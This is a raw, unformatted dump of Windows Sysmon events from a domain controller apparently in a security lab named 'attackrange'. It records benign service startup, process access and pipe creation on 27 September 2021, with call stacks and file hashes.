09:20:16.702{5EBD8912-8CBD-6151-0A00-00000000FD01}6243012C:\Windows\system32\services.exe{5EBD8912-8CD0-6151-2800-00000000FD01}2200C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053066Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.635{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8CD0-6151-2F00-00000000FD01}2544C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053065Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.635{5EBD8912-8CBD-6151-0A00-00000000FD01}624716C:\Windows\system32\services.exe{5EBD8912-8CD0-6151-2F00-00000000FD01}2544C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+3332|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053064Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.400{5EBD8912-8CD0-6151-2F00-00000000FD01}2544C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe-----"C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=BBAE700ACE8ED78E8ADF1DEFFB197405,SHA256=6A681197092F46092D23CC95FF245F81C1AE7C7F302411757D035CA2908DFB14,IMPHASH=4035D2883E01D64F3E7A9DCCB1D63AF5{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001053063Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.635{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CD0-6151-2800-00000000FD01}2200C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053062Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.635{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CD0-6151-2800-00000000FD01}2200C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053061Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.573{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-3100-00000000FD01}2520C:\Windows\system32\wbem\unsecapp.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053060Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.557{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8CD0-6151-3100-00000000FD01}2520C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053059Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.557{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-3100-00000000FD01}2520C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+366e9|c:\windows\system32\rpcss.dll+3bed2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053058Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.566{5EBD8912-8CD0-6151-3100-00000000FD01}2520C:\Windows\System32\wbem\unsecapp.exe10.0.14393.4169 (rs1_release.210107-1130)Sink to receive asynchronous callbacks for WMI client applicationMicrosoft® Windows® Operating SystemMicrosoft Corporationunsecapp.dllC:\Windows\system32\wbem\unsecapp.exe -EmbeddingC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=2443CA5962E2134CB389DCD5056D27AE,SHA256=018FF62BCDC292CF9290DB0574C8EF9C97EBC26933C8FC950DD8E6B2B91972FB,IMPHASH=A3CC49DF67C2278F822C9EBB9908BF09{5EBD8912-8CBF-6151-0C00-00000000FD01}844C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000001053057Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.557{5EBD8912-8CBD-6151-0A00-00000000FD01}624712C:\Windows\system32\services.exe{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053056Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.542{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2E00-00000000FD01}2384C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053055Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.542{5EBD8912-8CBD-6151-0A00-00000000FD01}624692C:\Windows\system32\services.exe{5EBD8912-8CD0-6151-2E00-00000000FD01}2384C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053054Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.542{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053053Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.526{5EBD8912-8CBD-6151-0A00-00000000FD01}624692C:\Windows\system32\services.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x80000000000000001053052Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-CreatePipe2021-09-27 09:20:16.512{5EBD8912-8CD0-6151-2D00-00000000FD01}2452\netdfsC:\Windows\system32\dfssvc.exe 10341000x80000000000000001053051Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.512{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CA0-6151-0100-00000000FD01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053050Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.512{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CA0-6151-0100-00000000FD01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053049Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.497{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CD0-6151-2500-00000000FD01}2936C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053048Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.497{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CD0-6151-2500-00000000FD01}2936C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053047Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.479{5EBD8912-8CBD-6151-0A00-00000000FD01}624708C:\Windows\system32\services.exe{5EBD8912-8CD0-6151-2D00-00000000FD01}2452C:\Windows\system32\dfssvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053046Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.452{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8CD0-6151-2E00-00000000FD01}2384C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053045Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.452{5EBD8912-8CBD-6151-0A00-00000000FD01}624712C:\Windows\system32\services.exe{5EBD8912-8CD0-6151-2E00-00000000FD01}2384C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053044Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.392{5EBD8912-8CD0-6151-2E00-00000000FD01}2384C:\Windows\System32\dfsrs.exe10.0.14393.4169 (rs1_release.210107-1130)Distributed File System ReplicationMicrosoft® Windows® Operating SystemMicrosoft Corporationdfsr.exeC:\Windows\system32\DFSRs.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=F2483716D6C752FB448C7295AA3B49A1,SHA256=6B77249159D3C217694B52F0B1C75E0649486EF4A3FE4513CD41D81E7DEB709A,IMPHASH=C1481566D7D03EEC4CC460B52429BA9C{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001053043Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.432{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053042Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.432{5EBD8912-8CBD-6151-0A00-00000000FD01}624100C:\Windows\system32\services.exe{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053041Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.370{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exe10.0.14393.4530 (rs1_release.210705-0736)Domain Name System (DNS) ServerMicrosoft® Windows® Operating SystemMicrosoft Corporationdns.exeC:\Windows\system32\dns.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=71B9B942CD20776EF137B04678593EE7,SHA256=A4E7C2A7FFE0CB9E14DE9A77445A0E61CB181D8AC5A45F64571E53996E42362C,IMPHASH=F11D7ACAC98040FCC69808598F92C5FA{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001053040Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.417{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053039Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.417{5EBD8912-8CBD-6151-0A00-00000000FD01}6243004C:\Windows\system32\services.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+3332|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053038Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.370{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe13.01System activity monitorSysinternals SysmonSysinternals - www.sysinternals.com-C:\Windows\sysmon64.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=8A914CFB7496B8461285C009DD8F5627,SHA256=422EC998FED690C2EC3239A4BB80075F098A9A95CBDFFBC873365B9F7136A02A,IMPHASH=DCF866F4139DD7FF6C0A5D4FA050CD7A{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001053037Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 